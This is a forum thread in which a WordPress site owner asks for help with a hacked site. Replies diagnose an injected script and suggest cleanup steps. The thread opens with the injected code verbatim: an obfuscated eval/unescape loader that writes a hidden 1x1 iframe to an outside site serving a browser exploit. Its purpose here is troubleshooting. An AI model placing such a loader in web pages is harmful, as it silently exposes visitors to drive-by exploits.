<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script> Code (markup): Recently, today and yesterday, my site has been acting weird. 1. When I access my wordpress dashboard it will load normally then begin to look like it's reloading and it stays stuck on a blank page and it keeps trying to load whatever content its loading. 2. Some people have said that their security software won't let them access the site. 3. Some people have said that a weird program tries to open whenever they go to a page on my site. 4. Some people have said that their window closes when they go to my site. My site is Maddenholics.com and the same errors happen on my forums (forum.maddenholics.com). I have recently discovered that code that I posted above, I have never noticed before and I am sure it wasn't there before. If you guys can help that would be great! Thanks in advance.
This does: document.write('<iframe src="http://[_removed by me_].com/in.php" width=1 height=1 frameborder=0></iframe>'); It goes to another iframe, which goes to another iframe, which is some javascript exploit. Your site has a JS exploit on it and you should secure your server/hire someone that knows what they are doing. 1. This is because one of the <iframe>s is down, webserver-wise, resulting in 'stuck' 2. This is because their antivirus has detected the exploit 3. This is because they are vulnerable to the exploit 4. This is because their antivirus has detected the exploit or the browser has died or crashed due to it
I'll contact my hosting support. I was thinking that's what happened, but wanted to make sure, thanks for the help!
Your host won't do anything about it. They don't get paid to fix your hacked site. That is what they will tell you anyway. You will have to reinstall a clean Wordpress and hopefully you backed up your site sometime previously. With MySql injections it is a nightmare trying to find all of the scripts these people inject. And krsix didn't remove a url he looked at your source code. Anyone can do that from their browser. Your host will not fix it, I can almost guarantee it. Just wanted to forewarn you. And whatever is being seen just by looking at your source code is probably just the tip of the iceberg. When they do this crap they inject hundreds of malicious files in your database most of the time. There could be literally hundreds of redirects and all kinds of nasty varmints in there. If all they did was throw some script at you, you are lucky. I doubt it though. You said that your forum was having the same issue, so that is why I think you have been the target of more than meets the eye. Very sad. Sorry that happened to you. I know what it's like.
Update: I called godaddy and they helped me resolve the issue! The hack is gone! Just had to restore my files and it worked. Thanks for the help anyways you guys! Who said godaddy doesn't have support???
If they got in once they will get in again. Make sure you are using the latest version of the CMS and check to see that no one has admin rights who shouldn't. It is also possible that you are using an insecure plugin.